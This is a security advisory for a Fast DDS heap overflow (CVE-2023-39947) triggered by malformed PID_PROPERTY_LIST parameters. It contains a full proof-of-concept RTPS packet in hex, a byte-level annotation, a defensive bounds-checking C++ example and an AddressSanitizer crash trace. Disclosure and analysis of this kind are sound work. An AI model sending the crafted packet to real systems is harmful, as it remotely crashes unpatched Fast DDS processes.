CVE-2023-39947: Another heap overflow in push_back_helper

eprosima Fast DDS is a C++ implementation of the Data Distribution Service standard of the Object Management Group. Prior to versions 2.11.1, 2.10.2, 2.9.2, and 2.6.6, even after the fix at commit 3492270, malformed PID_PROPERTY_LIST parameters cause heap overflow at a different program counter. This can remotely crash any Fast-DDS process. Versions 2.11.1, 2.10.2, 2.9.2, and 2.6.6 contain a patch for this issue.


Even after the fix in 3492270, malformed PID_PROPERTY_LIST parameters cause heap overflow at a different program counter.

0000   52 54 50 53 02 02 ff ff 01 0f 45 d2 b3 f5 58 b9
0010   01 00 00 00 15 05 cc 00 00 00 10 00 00 01 00 c7
0020   00 01 00 c2 00 00 00 00 01 00 00 00 00 03 00 00
0030   15 00 04 00 02 02 00 00 16 00 04 00 01 0f 00 00
0040   50 00 10 00 01 0f 11 3e f6 42 cd 90 00 00 00 00
0050   00 00 01 c1 32 00 18 00 01 00 00 00 f2 1c 00 00
0060   00 00 00 00 00 00 00 00 00 00 00 00 0a 00 00 0f
0070   31 00 18 00 01 00 00 00 f3 1c 00 00 00 00 00 00
0080   00 00 00 00 00 00 00 00 0a 00 00 0f 02 00 08 00
0090   14 00 00 00 00 00 00 00 58 00 04 00 3f 0c 00 00
00a0   62 00 10 00 0a 00 00 00 70 75 62 6c 69 73 68 65
00b0   72 00 00 00 59 00 28 00 01 00 00 00 11 00 00 00
00c0   50 41 52 54 49 43 49 50 41 4e 54 5f 54 59 50 45
00d0   00 00 00 00 f3 ff ff ff 53 49 4d 50 4c 45 00 00
00e0   01 00 00 00


59 00 // PID_PROPERTY_LIST
28 00 // 40 bytes
01 00 // CDR_LE
00 00 // CDR opt

11 00 00 00 // size: 17
50 41 52 54 // <- data + padding
49 43 49 50 // -
41 4e 54 5f // -
54 59 50 45 // -
00 00 00 00 // ->

f3 ff ff ff // size: 4294967283
53 49 4d 50 4c 45 00 00 // data (insufficient)
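The annotation above shows the defect class in one picture: the second string declares 4294967283 bytes while only 8 remain in the parameter. The C++ below is an added example, not code from Fast DDS or from the reporter. It feeds the 36 bytes that follow the parameter's 4-byte header (copied from the dump above) through a bounds-checked reader that compares every declared length with the bytes actually remaining before copying anything, and through an overflow-checked size accumulator beside its naive counterpart. The function names `parse_property_strings`, `padded_total_size` and `padded_total_unchecked`, the layout assumption (little-endian uint32 length, payload, 4-byte CDR padding), and the wrap arithmetic are this example's own; the page does not show the code inside `push_back_helper`, so the wrap is offered as a hypothesis that is consistent with the 16-byte region in the ASan report, not as the confirmed cause.

```cpp
// Added example (not Fast DDS code): bounds-checked reading of a
// PID_PROPERTY_LIST body plus overflow-checked size accumulation.
#include <algorithm>
#include <cstddef>
#include <cstdint>
#include <string>
#include <vector>

struct PropertyParse {
    bool ok = true;
    size_t bad_index = 0;              // first string rejected, if !ok
    std::vector<std::string> values;   // strings accepted before the failure
};

// Read one little-endian uint32 only if 4 bytes remain. Invariant: pos <= len.
static bool read_u32_le(const uint8_t* p, size_t len, size_t& pos, uint32_t& out) {
    if (len - pos < 4) return false;
    out = uint32_t(p[pos]) | (uint32_t(p[pos + 1]) << 8) |
          (uint32_t(p[pos + 2]) << 16) | (uint32_t(p[pos + 3]) << 24);
    pos += 4;
    return true;
}

// Parse length-prefixed strings (assumed layout: uint32 LE length, payload,
// padding to a 4-byte boundary). Each declared length is checked against the
// bytes actually remaining before any copy; the comparison is between two
// size_t values that cannot wrap, and no running total is involved.
PropertyParse parse_property_strings(const uint8_t* data, size_t len) {
    PropertyParse r;
    size_t pos = 0;
    for (size_t i = 0; pos < len; ++i) {
        uint32_t declared = 0;
        if (!read_u32_le(data, len, pos, declared) || declared > len - pos) {
            r.ok = false;
            r.bad_index = i;
            return r;
        }
        r.values.emplace_back(reinterpret_cast<const char*>(data + pos), declared);
        pos += declared;
        size_t pad = (4 - pos % 4) % 4;        // CDR 4-byte alignment
        pos += std::min(pad, len - pos);       // tolerate a missing final pad
    }
    return r;
}

// Overflow-checked accumulation of the bytes the strings would occupy
// (4-byte length prefix + padded payload per string). Returns false instead
// of wrapping. Hypothesis, not taken from the page: an unchecked uint32 sum
// of the lengths declared above (17 -> 20 padded, 0xfffffff3 -> 0xfffffff4
// padded) gives 24 + 0xfffffff8 = 16 (mod 2^32), the size of the region
// ASan reports, which would explain why a 17-byte copy overflows it.
bool padded_total_size(const std::vector<uint32_t>& declared, uint32_t& total) {
    total = 0;
    for (uint32_t d : declared) {
        if (d > UINT32_MAX - 3) return false;            // padding would wrap
        uint32_t padded = (d + 3) & ~uint32_t(3);
        if (padded > UINT32_MAX - 4) return false;       // prefix would wrap
        uint32_t item = padded + 4;
        if (item > UINT32_MAX - total) return false;     // running sum would wrap
        total += item;
    }
    return true;
}

// Naive variant for comparison: what an unchecked uint32 sum produces.
uint32_t padded_total_unchecked(const std::vector<uint32_t>& declared) {
    uint32_t total = 0;
    for (uint32_t d : declared) total += ((d + 3) & ~uint32_t(3)) + 4;
    return total;
}

// The 36 bytes following the 4-byte header of the PID_PROPERTY_LIST above,
// copied from the annotated dump on this page.
static const uint8_t kPropertyBody[36] = {
    0x11, 0x00, 0x00, 0x00,                                   // size: 17
    'P','A','R','T','I','C','I','P','A','N','T','_','T','Y','P','E',
    0x00, 0x00, 0x00, 0x00,                                   // NUL + padding
    0xf3, 0xff, 0xff, 0xff,                                   // size: 4294967283
    'S','I','M','P','L','E', 0x00, 0x00                       // only 8 bytes present
};

int main() {
    PropertyParse r = parse_property_strings(kPropertyBody, sizeof kPropertyBody);
    // r.ok == false, r.bad_index == 1, r.values.size() == 1
    uint32_t total = 0;
    bool fits = padded_total_size({17u, 0xfffffff3u}, total);
    // fits == false; padded_total_unchecked({17u, 0xfffffff3u}) == 16
    return (r.ok || fits) ? 1 : 0;
}
```

The two checks are independent defences: the per-string comparison against the remaining bytes rejects the malformed entry on its own, and the checked accumulator refuses to produce an undersized allocation even if a length check were missed upstream. Either one, applied before `memcpy`, turns this crash into a rejected parameter.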



=================================================================
==4118777==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000036020 at pc 0x000000474523 bp 0x7f2dfb4fb7a0 sp 0x7f2dfb4faf60
WRITE of size 17 at 0x602000036020 thread T3
    #0 0x474522 in memcpy (/home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/examples/cpp/dds/HelloWorld/DDSSecureHelloWorldExample+0x474522)
    #1 0x7f2e0147b492 in eprosima::fastdds::dds::ParameterPropertyList_t::push_back_helper(unsigned char const*, unsigned int, unsigned int) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/include/fastdds/dds/core/policy/ParameterTypes.hpp:1518:15
    #2 0x7f2e0147b3e8 in eprosima::fastdds::dds::ParameterPropertyList_t::push_back(unsigned char const*, unsigned int, unsigned char const*, unsigned int) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/include/fastdds/dds/core/policy/ParameterTypes.hpp:1448:25
    #3 0x7f2e014a59a8 in eprosima::fastdds::dds::ParameterSerializer<eprosima::fastdds::dds::ParameterPropertyList_t>::read_content_from_cdr_message(eprosima::fastdds::dds::ParameterPropertyList_t&, eprosima::fastrtps::rtps::CDRMessage_t*, unsigned short) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/fastdds/core/policy/ParameterSerializer.hpp:685:28
    #4 0x7f2e014a65b9 in eprosima::fastdds::dds::ParameterSerializer<eprosima::fastdds::dds::ParameterPropertyList_t>::read_from_cdr_message(eprosima::fastdds::dds::ParameterPropertyList_t&, eprosima::fastrtps::rtps::CDRMessage_t*, unsigned short) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/fastdds/core/policy/ParameterSerializer.hpp:62:47
    #5 0x7f2e014bf0e2 in eprosima::fastrtps::rtps::ParticipantProxyData::readFromCDRMessage(eprosima::fastrtps::rtps::CDRMessage_t*, bool, eprosima::fastrtps::rtps::NetworkFactory const&, bool)::'lambda'(eprosima::fastrtps::rtps::CDRMessage_t*, eprosima::fastdds::dds::ParameterId_t const&, unsigned short)::operator()(eprosima::fastrtps::rtps::CDRMessage_t*, eprosima::fastdds::dds::ParameterId_t const&, unsigned short) const /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/builtin/data/ParticipantProxyData.cpp:571:111
    #6 0x7f2e014c064a in bool eprosima::fastdds::dds::ParameterList::readParameterListfromCDRMsg<eprosima::fastrtps::rtps::ParticipantProxyData::readFromCDRMessage(eprosima::fastrtps::rtps::CDRMessage_t*, bool, eprosima::fastrtps::rtps::NetworkFactory const&, bool)::'lambda'(eprosima::fastrtps::rtps::CDRMessage_t*, eprosima::fastdds::dds::ParameterId_t const&, unsigned short)>(eprosima::fastrtps::rtps::CDRMessage_t&, eprosima::fastrtps::rtps::ParticipantProxyData::readFromCDRMessage(eprosima::fastrtps::rtps::CDRMessage_t*, bool, eprosima::fastrtps::rtps::NetworkFactory const&, bool)::'lambda'(eprosima::fastrtps::rtps::CDRMessage_t*, eprosima::fastdds::dds::ParameterId_t const&, unsigned short), bool, unsigned int&) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/fastdds/core/policy/ParameterList.hpp:133:31
    #7 0x7f2e014bf5bb in eprosima::fastrtps::rtps::ParticipantProxyData::readFromCDRMessage(eprosima::fastrtps::rtps::CDRMessage_t*, bool, eprosima::fastrtps::rtps::NetworkFactory const&, bool) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/builtin/data/ParticipantProxyData.cpp:652:58
    #8 0x7f2e0148c420 in eprosima::fastrtps::rtps::PDPListener::onNewCacheChangeAdded(eprosima::fastrtps::rtps::RTPSReader*, eprosima::fastrtps::rtps::CacheChange_t const*) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/builtin/discovery/participant/PDPListener.cpp:104:54
    #9 0x7f2e0112fa37 in eprosima::fastrtps::rtps::StatelessReader::change_received(eprosima::fastrtps::rtps::CacheChange_t*) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/reader/StatelessReader.cpp:329:52
    #10 0x7f2e01130cc7 in eprosima::fastrtps::rtps::StatelessReader::processDataMsg(eprosima::fastrtps::rtps::CacheChange_t*) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/reader/StatelessReader.cpp:557:33
    #11 0x7f2e0114ecc8 in eprosima::fastrtps::rtps::MessageReceiver::process_data_message_without_security(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&)::'lambda'(eprosima::fastrtps::rtps::RTPSReader*)::operator()(eprosima::fastrtps::rtps::RTPSReader*) const /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/messages/MessageReceiver.cpp:202:39
    #12 0x7f2e01156309 in void eprosima::fastrtps::rtps::MessageReceiver::findAllReaders<eprosima::fastrtps::rtps::MessageReceiver::process_data_message_without_security(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&)::'lambda'(eprosima::fastrtps::rtps::RTPSReader*)>(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::MessageReceiver::process_data_message_without_security(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&)::'lambda'(eprosima::fastrtps::rtps::RTPSReader*) const&) const /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/messages/MessageReceiver.cpp:668:25
    #13 0x7f2e0114ed11 in eprosima::fastrtps::rtps::MessageReceiver::process_data_message_without_security(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/messages/MessageReceiver.cpp:205:19
    #14 0x7f2e0115fee6 in void std::__invoke_impl<void, void (eprosima::fastrtps::rtps::MessageReceiver::*&)(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&), eprosima::fastrtps::rtps::MessageReceiver*&, eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&>(std::__invoke_memfun_deref, void (eprosima::fastrtps::rtps::MessageReceiver::*&)(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&), eprosima::fastrtps::rtps::MessageReceiver*&, eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&) /usr/include/c++/9/bits/invoke.h:73:46
    #15 0x7f2e0115f279 in std::__invoke_result<void (eprosima::fastrtps::rtps::MessageReceiver::*&)(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&), eprosima::fastrtps::rtps::MessageReceiver*&, eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&>::type std::__invoke<void (eprosima::fastrtps::rtps::MessageReceiver::*&)(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&), eprosima::fastrtps::rtps::MessageReceiver*&, eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&>(void (eprosima::fastrtps::rtps::MessageReceiver::*&)(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&), eprosima::fastrtps::rtps::MessageReceiver*&, eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&) /usr/include/c++/9/bits/invoke.h:95:40
    #16 0x7f2e0115e3b4 in void std::_Bind<void (eprosima::fastrtps::rtps::MessageReceiver::* (eprosima::fastrtps::rtps::MessageReceiver*, std::_Placeholder<1>, std::_Placeholder<2>))(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&)>::__call<void, eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&, 0ul, 1ul, 2ul>(std::tuple<eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&>&&, std::_Index_tuple<0ul, 1ul, 2ul>) /usr/include/c++/9/functional:400:24
    #17 0x7f2e0115d230 in void std::_Bind<void (eprosima::fastrtps::rtps::MessageReceiver::* (eprosima::fastrtps::rtps::MessageReceiver*, std::_Placeholder<1>, std::_Placeholder<2>))(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&)>::operator()<eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&, void>(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&) /usr/include/c++/9/functional:484:24
    #18 0x7f2e0115bfad in std::_Function_handler<void (eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&), std::_Bind<void (eprosima::fastrtps::rtps::MessageReceiver::* (eprosima::fastrtps::rtps::MessageReceiver*, std::_Placeholder<1>, std::_Placeholder<2>))(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&)> >::_M_invoke(std::_Any_data const&, eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&) /usr/include/c++/9/bits/std_function.h:300:37
    #19 0x7f2e0115a250 in std::function<void (eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&)>::operator()(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&) const /usr/include/c++/9/bits/std_function.h:688:14
    #20 0x7f2e01152ef1 in eprosima::fastrtps::rtps::MessageReceiver::proc_Submsg_Data(eprosima::fastrtps::rtps::CDRMessage_t*, eprosima::fastrtps::rtps::SubmessageHeader_t*) const /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/messages/MessageReceiver.cpp:841:35
    #21 0x7f2e0114fa21 in eprosima::fastrtps::rtps::MessageReceiver::processCDRMsg(eprosima::fastrtps::rtps::Locator_t const&, eprosima::fastrtps::rtps::Locator_t const&, eprosima::fastrtps::rtps::CDRMessage_t*) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/messages/MessageReceiver.cpp:418:45
    #22 0x7f2e01171827 in eprosima::fastrtps::rtps::ReceiverResource::OnDataReceived(unsigned char const*, unsigned int, eprosima::fastrtps::rtps::Locator_t const&, eprosima::fastrtps::rtps::Locator_t const&) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/network/ReceiverResource.cpp:132:27
    #23 0x7f2e012c2166 in eprosima::fastdds::rtps::UDPChannelResource::perform_listen_operation(eprosima::fastrtps::rtps::Locator_t) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/transport/UDPChannelResource.cpp:70:47
    #24 0x7f2e012c617c in void std::__invoke_impl<void, void (eprosima::fastdds::rtps::UDPChannelResource::*)(eprosima::fastrtps::rtps::Locator_t), eprosima::fastdds::rtps::UDPChannelResource*, eprosima::fastrtps::rtps::Locator_t>(std::__invoke_memfun_deref, void (eprosima::fastdds::rtps::UDPChannelResource::*&&)(eprosima::fastrtps::rtps::Locator_t), eprosima::fastdds::rtps::UDPChannelResource*&&, eprosima::fastrtps::rtps::Locator_t&&) /usr/include/c++/9/bits/invoke.h:73:46
    #25 0x7f2e012c6028 in std::__invoke_result<void (eprosima::fastdds::rtps::UDPChannelResource::*)(eprosima::fastrtps::rtps::Locator_t), eprosima::fastdds::rtps::UDPChannelResource*, eprosima::fastrtps::rtps::Locator_t>::type std::__invoke<void (eprosima::fastdds::rtps::UDPChannelResource::*)(eprosima::fastrtps::rtps::Locator_t), eprosima::fastdds::rtps::UDPChannelResource*, eprosima::fastrtps::rtps::Locator_t>(void (eprosima::fastdds::rtps::UDPChannelResource::*&&)(eprosima::fastrtps::rtps::Locator_t), eprosima::fastdds::rtps::UDPChannelResource*&&, eprosima::fastrtps::rtps::Locator_t&&) /usr/include/c++/9/bits/invoke.h:95:40
    #26 0x7f2e012c5f38 in void std::thread::_Invoker<std::tuple<void (eprosima::fastdds::rtps::UDPChannelResource::*)(eprosima::fastrtps::rtps::Locator_t), eprosima::fastdds::rtps::UDPChannelResource*, eprosima::fastrtps::rtps::Locator_t> >::_M_invoke<0ul, 1ul, 2ul>(std::_Index_tuple<0ul, 1ul, 2ul>) /usr/include/c++/9/thread:244:26
    #27 0x7f2e012c5ebe in std::thread::_Invoker<std::tuple<void (eprosima::fastdds::rtps::UDPChannelResource::*)(eprosima::fastrtps::rtps::Locator_t), eprosima::fastdds::rtps::UDPChannelResource*, eprosima::fastrtps::rtps::Locator_t> >::operator()() /usr/include/c++/9/thread:251:31
    #28 0x7f2e012c5e8f in std::thread::_State_impl<std::thread::_Invoker<std::tuple<void (eprosima::fastdds::rtps::UDPChannelResource::*)(eprosima::fastrtps::rtps::Locator_t), eprosima::fastdds::rtps::UDPChannelResource*, eprosima::fastrtps::rtps::Locator_t> > >::_M_run() /usr/include/c++/9/thread:195:13
    #29 0x7f2e00149de3  (/lib/x86_64-linux-gnu/libstdc++.so.6+0xd6de3)
    #30 0x7f2e005ef608 in start_thread /build/glibc-SzIz7B/glibc-2.31/nptl/pthread_create.c:477:8
    #31 0x7f2dffe34132 in clone /build/glibc-SzIz7B/glibc-2.31/misc/../sysdeps/unix/sysv/linux/x86_64/clone.S:95

0x602000036020 is located 0 bytes to the right of 16-byte region [0x602000036010,0x602000036020)
allocated by thread T3 here:
    #0 0x4d9582 in calloc (/home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/examples/cpp/dds/HelloWorld/DDSSecureHelloWorldExample+0x4d9582)
    #1 0x7f2e0105275e in eprosima::fastrtps::rtps::SerializedPayload_t::reserve(unsigned int) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/include/fastdds/rtps/common/SerializedPayload.h:172:34
    #2 0x7f2e0147b3d2 in eprosima::fastdds::dds::ParameterPropertyList_t::push_back(unsigned char const*, unsigned int, unsigned char const*, unsigned int) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/include/fastdds/dds/core/policy/ParameterTypes.hpp:1444:28
    #3 0x7f2e014a59a8 in eprosima::fastdds::dds::ParameterSerializer<eprosima::fastdds::dds::ParameterPropertyList_t>::read_content_from_cdr_message(eprosima::fastdds::dds::ParameterPropertyList_t&, eprosima::fastrtps::rtps::CDRMessage_t*, unsigned short) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/fastdds/core/policy/ParameterSerializer.hpp:685:28
    #4 0x7f2e014a65b9 in eprosima::fastdds::dds::ParameterSerializer<eprosima::fastdds::dds::ParameterPropertyList_t>::read_from_cdr_message(eprosima::fastdds::dds::ParameterPropertyList_t&, eprosima::fastrtps::rtps::CDRMessage_t*, unsigned short) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/fastdds/core/policy/ParameterSerializer.hpp:62:47
    #5 0x7f2e014bf0e2 in eprosima::fastrtps::rtps::ParticipantProxyData::readFromCDRMessage(eprosima::fastrtps::rtps::CDRMessage_t*, bool, eprosima::fastrtps::rtps::NetworkFactory const&, bool)::'lambda'(eprosima::fastrtps::rtps::CDRMessage_t*, eprosima::fastdds::dds::ParameterId_t const&, unsigned short)::operator()(eprosima::fastrtps::rtps::CDRMessage_t*, eprosima::fastdds::dds::ParameterId_t const&, unsigned short) const /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/builtin/data/ParticipantProxyData.cpp:571:111
    #6 0x7f2e014c064a in bool eprosima::fastdds::dds::ParameterList::readParameterListfromCDRMsg<eprosima::fastrtps::rtps::ParticipantProxyData::readFromCDRMessage(eprosima::fastrtps::rtps::CDRMessage_t*, bool, eprosima::fastrtps::rtps::NetworkFactory const&, bool)::'lambda'(eprosima::fastrtps::rtps::CDRMessage_t*, eprosima::fastdds::dds::ParameterId_t const&, unsigned short)>(eprosima::fastrtps::rtps::CDRMessage_t&, eprosima::fastrtps::rtps::ParticipantProxyData::readFromCDRMessage(eprosima::fastrtps::rtps::CDRMessage_t*, bool, eprosima::fastrtps::rtps::NetworkFactory const&, bool)::'lambda'(eprosima::fastrtps::rtps::CDRMessage_t*, eprosima::fastdds::dds::ParameterId_t const&, unsigned short), bool, unsigned int&) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/fastdds/core/policy/ParameterList.hpp:133:31
    #7 0x7f2e014bf5bb in eprosima::fastrtps::rtps::ParticipantProxyData::readFromCDRMessage(eprosima::fastrtps::rtps::CDRMessage_t*, bool, eprosima::fastrtps::rtps::NetworkFactory const&, bool) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/builtin/data/ParticipantProxyData.cpp:652:58
    #8 0x7f2e0148c420 in eprosima::fastrtps::rtps::PDPListener::onNewCacheChangeAdded(eprosima::fastrtps::rtps::RTPSReader*, eprosima::fastrtps::rtps::CacheChange_t const*) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/builtin/discovery/participant/PDPListener.cpp:104:54
    #9 0x7f2e0112fa37 in eprosima::fastrtps::rtps::StatelessReader::change_received(eprosima::fastrtps::rtps::CacheChange_t*) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/reader/StatelessReader.cpp:329:52
    #10 0x7f2e01130cc7 in eprosima::fastrtps::rtps::StatelessReader::processDataMsg(eprosima::fastrtps::rtps::CacheChange_t*) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/reader/StatelessReader.cpp:557:33
    #11 0x7f2e0114ecc8 in eprosima::fastrtps::rtps::MessageReceiver::process_data_message_without_security(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&)::'lambda'(eprosima::fastrtps::rtps::RTPSReader*)::operator()(eprosima::fastrtps::rtps::RTPSReader*) const /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/messages/MessageReceiver.cpp:202:39
    #12 0x7f2e01156309 in void eprosima::fastrtps::rtps::MessageReceiver::findAllReaders<eprosima::fastrtps::rtps::MessageReceiver::process_data_message_without_security(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&)::'lambda'(eprosima::fastrtps::rtps::RTPSReader*)>(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::MessageReceiver::process_data_message_without_security(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&)::'lambda'(eprosima::fastrtps::rtps::RTPSReader*) const&) const /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/messages/MessageReceiver.cpp:668:25
    #13 0x7f2e0114ed11 in eprosima::fastrtps::rtps::MessageReceiver::process_data_message_without_security(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/messages/MessageReceiver.cpp:205:19
    #14 0x7f2e0115fee6 in void std::__invoke_impl<void, void (eprosima::fastrtps::rtps::MessageReceiver::*&)(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&), eprosima::fastrtps::rtps::MessageReceiver*&, eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&>(std::__invoke_memfun_deref, void (eprosima::fastrtps::rtps::MessageReceiver::*&)(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&), eprosima::fastrtps::rtps::MessageReceiver*&, eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&) /usr/include/c++/9/bits/invoke.h:73:46
    #15 0x7f2e0115f279 in std::__invoke_result<void (eprosima::fastrtps::rtps::MessageReceiver::*&)(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&), eprosima::fastrtps::rtps::MessageReceiver*&, eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&>::type std::__invoke<void (eprosima::fastrtps::rtps::MessageReceiver::*&)(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&), eprosima::fastrtps::rtps::MessageReceiver*&, eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&>(void (eprosima::fastrtps::rtps::MessageReceiver::*&)(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&), eprosima::fastrtps::rtps::MessageReceiver*&, eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&) /usr/include/c++/9/bits/invoke.h:95:40
    #16 0x7f2e0115e3b4 in void std::_Bind<void (eprosima::fastrtps::rtps::MessageReceiver::* (eprosima::fastrtps::rtps::MessageReceiver*, std::_Placeholder<1>, std::_Placeholder<2>))(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&)>::__call<void, eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&, 0ul, 1ul, 2ul>(std::tuple<eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&>&&, std::_Index_tuple<0ul, 1ul, 2ul>) /usr/include/c++/9/functional:400:24
    #17 0x7f2e0115d230 in void std::_Bind<void (eprosima::fastrtps::rtps::MessageReceiver::* (eprosima::fastrtps::rtps::MessageReceiver*, std::_Placeholder<1>, std::_Placeholder<2>))(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&)>::operator()<eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&, void>(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&) /usr/include/c++/9/functional:484:24
    #18 0x7f2e0115bfad in std::_Function_handler<void (eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&), std::_Bind<void (eprosima::fastrtps::rtps::MessageReceiver::* (eprosima::fastrtps::rtps::MessageReceiver*, std::_Placeholder<1>, std::_Placeholder<2>))(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&)> >::_M_invoke(std::_Any_data const&, eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&) /usr/include/c++/9/bits/std_function.h:300:37
    #19 0x7f2e0115a250 in std::function<void (eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&)>::operator()(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&) const /usr/include/c++/9/bits/std_function.h:688:14
